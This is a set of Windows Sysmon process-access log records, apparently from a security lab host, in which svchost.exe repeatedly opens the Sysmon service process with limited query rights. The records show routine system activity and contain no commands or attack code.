{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6530,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6531,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6532,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6533,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6534,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6535,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6536,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:57:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6537,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:57:53.057\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:57:53.057","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:57:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
